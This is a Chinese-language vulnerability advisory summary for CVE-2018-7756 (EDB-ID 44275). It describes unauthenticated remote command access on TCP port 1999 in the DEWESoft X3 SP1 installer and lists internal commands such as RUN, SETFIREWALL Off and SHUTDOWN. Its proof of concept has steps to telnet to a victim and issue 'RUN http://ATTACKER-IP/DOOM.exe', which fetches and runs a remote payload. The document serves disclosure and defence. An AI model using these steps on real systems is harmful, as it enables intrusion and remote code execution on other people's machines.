关键信息 漏洞名称: DEWESoft X3 SP1 (x64) - Remote Command Execution EDB-ID: 44275 CVE: 2018-7756 作者: HYp3RLiNK 类型: Remote 平台: Windows_x86-64 日期: 2018-03-12 漏洞应用程序: 未列出 漏洞描述 厂商: www.dewesoft.com 产品: DEWESoft X3 SP1 (64-bit) installer - X3 DEWESoft_FULL_X3_SP1_64BIT.exe 漏洞类型: Remote Internal Command Access CVE参考: CVE-2018-7756 安全问题 问题详情: 安装器中的"RunExeFile.exe"组件在TCP端口1999的会话中不需要身份验证,允许远程攻击者执行任意代码或访问内部命令。 内部命令: RUN, RUNEX, GETFIREWALL, SETFIREWALL Off, KILL, USERNAME, SHUTDOWN, SENDKEYS, LIST, DWPIPE 利用/概念验证 或 1. Launch the victim's browser and send them to a website for a drive-by download. 2. TELNET x.x.x.x 1999 3. RUN http://ATTACKER-IP/DOOM.exe 4. Execute it from Downloads directory. 其他信息 网络访问: Remote 严重性: High 披露时间线: - Vendor Notification: 2018-02-09 - Public Disclosure: 2018-03-10